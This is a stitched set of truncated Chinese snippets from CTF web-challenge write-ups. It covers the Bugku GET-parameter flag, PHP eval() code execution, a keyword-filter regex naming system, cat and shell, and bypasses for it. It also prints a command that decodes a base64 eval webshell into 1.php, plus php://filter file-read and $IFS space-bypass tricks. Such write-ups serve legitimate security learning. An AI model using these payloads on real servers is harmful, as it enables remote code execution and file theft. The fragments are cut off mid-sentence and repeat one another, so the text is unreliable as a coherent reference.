3.web基础$_GET此题考的是get传参get传参即由http规定,使用method为GET,将参数数据列加到url中 查看一下源码,如果变量 $what=flag即可得到flag所以我们就可以在url中加上?what=flag就可以得到flagflag{bugku_get_su8kej2en} CTF Web入门题目——Bugku Web 题目题解——发送HTTP请求篇(3道基础题目) ...
GET那题 就算没有学过php也会看懂if条件语句 于是我们在url后面直接加 ?what = flag 这样echo输出flag POST那题 直接火狐 要装hackbar插件 这个我攻防世界web新手区写了 ---恢复内容结束---
$what=$_GET['what'];echo$what;if($what=='flag')echo'flag{***}'; 意思是传入了一个参数what,当what的值等于flag,就会打印出flag 我们就直接构造?what=flag 然后直接就爆出了flag值 作者:Angel_Kitty出 处:https://www.cnblogs.com/ECJTUACM-873284962/关于作者:阿里云ACE,目前主要研究方向是Web安全漏...
$what=$_GET['what']; //GET 方式获取参数what echo $what; //输出what 参数的值 if($what=='flag') //if 判断 $what 是否等于 flag echo'flag{***}'; 通过GET 方式(URL)获取一个参数,参数名是`what`。 直接提交?what=flag,得到flagflag{bugku_get_su8kej2en} 编辑...
eval($_GET[‘exp’]); 将输入的参数以php代码执行; 02 方法(一) 1. 查看当前目录下的文件,此处利用scandir()实现: 代码语言:javascript 代码运行次数:0 运行 AI代码解释 <?phpprint_r(scandir("."));#表示获取当前目录下的文件;?> 代码语言:javascript ...
$c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |/i",$c)) //这里还过滤的.和空格 { eval($c); } ?> 1. 2. 3. 4. 5. 6. 7. 我们对参数逃逸进行理解 因为是rce漏洞,所以我们可以使用代码在构造一些新的参数,比如说我们构造一个新的参数,那我们在url中可以...
echo shell_exec($_GET[1]); }else{ exit('too long'); } ?> 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. AI检测代码解析 #写入语句 <?php eval($_GET[1]); #base64编码后 PD9waHAgZXZhbCgkX0dFVFsxXSk7 #需要被执行的语句: echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php ...
include $_GET[‘file’]; ?> 可以发现爆了3个错误,第一个是说配置文件里面禁用了data的数据流,第二是不能打开data的数据流,第三个是显示的不能打开文件,在include_path下面没有发现文件,所以就很明显在linux下面可以利用readfile不能读取文件,而include可以包含文件的特性了 ...
get_defined_vars get_defined_functions ReflectionClass $_SERVER[QUERY_STRING]、$_SERVER[REQUEST_URI] $_REQUEST 文件读取函数 PHP Tutorial (w3schools.com) 这部分需要掌握大量的漏洞函数,不想记忆可以直接用我写的插件 CTFWeb - Visual Studio Marketplacemarketplace.visualstudio.com/items?itemName=cyb...
2.借助php伪协议命令执行:括号或者分号被过滤时:include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php等方式。3.$IFS,$IFS默认为空白(空格、制表符、换行符),一般用来做空格绕过4.\可以绕过过滤flag关键字的linux语法下支持5.通过环境变量拼接执行命令。例如:${PATH:5:1}${...